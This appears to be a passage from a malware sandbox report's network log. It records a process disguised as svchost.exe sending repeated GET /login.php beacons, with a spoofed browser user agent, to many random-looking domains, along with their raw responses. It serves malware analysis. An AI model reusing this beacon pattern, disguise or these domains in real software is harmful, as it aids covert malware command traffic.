                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.892375946 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                            Nov 11, 2024 18:25:14.402524948 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:14.823067904 CET972INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:14 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qBAlrvTnig7QvNI1InQUawsK2kdPFyMeOSGgczpnrE5hnf2Uu6KXO7e5drwEv7IksacD809Rg0DkM4le2kxAhJfQ%2Fl6NG40RU7G8E7cUweYba8ZLPNsYG3G4araD6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0ffafd4e358c23-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1494&sent=5&recv=7&lost=0&retrans=0&sent_bytes=966&recv_bytes=486&delivery_rate=2527050&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            16192.168.2.106405318.208.156.248807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.323898077 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: pupycag.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.751981974 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:10 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=e76c610be23577b8805859f89c813957|66.23.206.109|1731345910|1731345910|0|1|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            17192.168.2.10640543.94.10.34807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.352009058 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lygynud.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.778263092 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:10 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=194e3c592d83e2fafc75e712f919f069|66.23.206.109|1731345910|1731345910|0|1|0; path=/; domain=.lygynud.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            18192.168.2.1064055103.150.10.48807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.805753946 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:11.599545956 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                            Nov 11, 2024 18:25:12.403079033 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:12.707199097 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            19192.168.2.1064057106.15.232.16380007908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:11.608824015 CET290OUTGET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 106.15.232.163:8000
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Nov 11, 2024 18:25:12.401871920 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: openresty/1.21.4.3
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Nov 11, 2024 18:25:12.708832979 CET290OUTGET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 106.15.232.163:8000
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Nov 11, 2024 18:25:12.975815058 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: openresty/1.21.4.3
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            20192.168.2.106405976.223.67.189807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.385380983 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qexyhuv.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.819880962 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:17 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 114
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            21192.168.2.1064060103.224.212.210807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.388879061 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyxynyx.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.941569090 CET340INHTTP/1.1 302 Found
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:25:17 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            set-cookie: __tad=1731345917.6190825; expires=Thu, 09-Nov-2034 17:25:17 GMT; Max-Age=315360000
                                                                                                                                                                                                            location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0425-1788-b22b-1a13d8aaa54b
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            22192.168.2.1064061103.224.182.252807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.443842888 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vofycot.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.030930042 CET338INHTTP/1.1 302 Found
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:25:17 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            set-cookie: __tad=1731345917.8924867; expires=Thu, 09-Nov-2034 17:25:17 GMT; Max-Age=315360000
                                                                                                                                                                                                            location: http://ww16.vofycot.com/login.php?sub1=20241112-0425-1706-a2c8-02526792f211
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            23192.168.2.106406264.225.91.73807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.518142939 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galynuh.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.068305016 CET816INHTTP/1.1 200 OK
                                                                                                                                                                                                            server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:25:17 GMT
                                                                                                                                                                                                            content-type: text/html
                                                                                                                                                                                                            content-length: 593
                                                                                                                                                                                                            last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                            etag: "63f68860-251"
                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            24192.168.2.1064063154.85.183.50807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.591176987 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.433862925 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:18 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.441287041 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.727142096 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:18 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            25192.168.2.106406444.221.84.105807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.617278099 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyciz.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.054240942 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:17 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
